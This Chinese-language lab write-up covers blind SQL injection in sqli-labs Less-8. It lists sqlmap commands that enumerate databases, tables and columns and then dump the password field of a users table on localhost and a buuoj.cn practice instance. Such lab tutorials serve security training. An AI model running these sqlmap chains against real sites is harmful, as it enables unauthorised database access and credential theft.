第八关还是用到了盲注,我们来使用kali里的sqlmap工具来搞一下。
1.sqlmap简介
sqlmap
是一款开源的自动化 SQL 注入和数据库接管工具,旨在帮助安全研究人员和渗透测试人员检测和利用 SQL 注入漏洞。它支持多种数据库管理系统(如 MySQL、PostgreSQL、Oracle、SQL Server 等),能够自动化检测目标网站或应用的 SQL 注入漏洞,提取数据库信息、列出表格和字段、导出数据,甚至执行系统级命令。sqlmap
还具备绕过防护机制、处理认证和会话管理、盲注攻击等高级功能,是进行数据库安全评估的强大工具。
2.sqlmap的简单使用
2:工具6连注入(附属一张别人的总结)
1. sqlmap -u "http://www.xx.com?id=x" 【查询是否存在注入点
2. sqlmap -u "http://www.xx.com?id=x" --dbs 【检测站点包含哪些数据库
3. sqlmap -u "http://www.xx.com?id=x" --current-db 【获取当前的数据库名
4. sqlmap -u "http://www.xx.com?id=x" --tables -D "db_name" 【获取指定数据库中的表名 -D后接指定的数据库名称
5. sqlmap -u "http://www.xx.com?id=x" --columns -T "table_name" -D "db_name" 【获取数据库表中的字段
6. sqlmap -u "http://www.xx.com?id=x" --dump -C "columns_name" -T "table_name" -D "db_name" 【获取字段的数据内容
3.现在做题理解一下
1.打开kali
这一步很重要,吼吼吼吼吼吼吼吼吼吼吼吼吼吼吼
2.爆数据库
sqlmap -u http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-8/?id=1 –dbs
获得数据库为security
3.爆表名
sqlmap -u "http://9f462409-59a4-4180-9019-1b157684a2a2.node5.buuoj.cn/Less-8/?id=1" -D security --tables
’
4.爆列名
sqlmap -u "http://9f462409-59a4-4180-9019-1b157684a2a2.node5.buuoj.cn/Less-8/?id=1" -T users -D security --columns
5.爆具体字段
sqlmap -u "http://9f462409-59a4-4180-9019-1b157684a2a2.node5.buuoj.cn/Less-8/?id=1" -C password -T users -D security --dump
sqlmap -u "http://9f462409-59a4-4180-9019-1b157684a2a2.node5.buuoj.cn/Less-8/?id=1" -C users -T users -D security --dump
结束